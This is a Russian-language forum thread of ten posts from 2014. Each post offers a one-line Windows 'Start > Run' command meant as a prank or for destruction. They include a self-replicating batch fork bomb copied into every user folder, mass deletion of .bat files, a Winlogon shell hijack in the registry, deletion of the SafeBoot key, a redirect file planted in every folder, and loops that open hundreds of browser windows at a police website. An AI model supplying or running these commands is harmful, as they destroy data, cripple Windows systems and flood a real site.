Пуск > Выполнить
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat
Пуск > Выполнить
Сообщений 1 страница 10 из 10
Поделиться12014-10-18 13:26:44
Поделиться22014-10-18 13:27:10
Пуск > Выполнить
cmd.exe /c for /l %i in (1,1,999) do @start iexplore 21.mvd.ru/gumvd/structure/otdel-k/
Поделиться32014-10-19 11:03:40
Пуск > Выполнить
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http : // tinyurl.com/pjz73xz"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
(Убрать пробелы в адресе http : // tinyurl.com/pjz73xz)
Поделиться42014-10-27 16:40:38
Пуск > Выполнить
cmd.exe /c for /r "%userprofile%" %x in (*.bat) do @del /f /q "%x"
(команда убивает все батники)
Поделиться52014-11-12 21:12:41
Пуск > Выполнить
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d cmd.exe /f
Поделиться62014-11-12 22:56:25
Пуск > Выполнить
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f
Поделиться72014-11-12 23:47:33
Пуск > Выполнить
cmd.exe /c for /l %i in (1,1,999) do @start /max iexplore 21.mvd.ru/gumvd/structure/otdel-k/?ping=%i
Поделиться82014-11-12 23:52:43
Пуск > Выполнить
taskkill /f /im explorer.exe
Поделиться92014-11-13 08:45:28
Пуск > Выполнить
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
Поделиться102014-11-13 20:52:50
Пуск > Выполнить
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat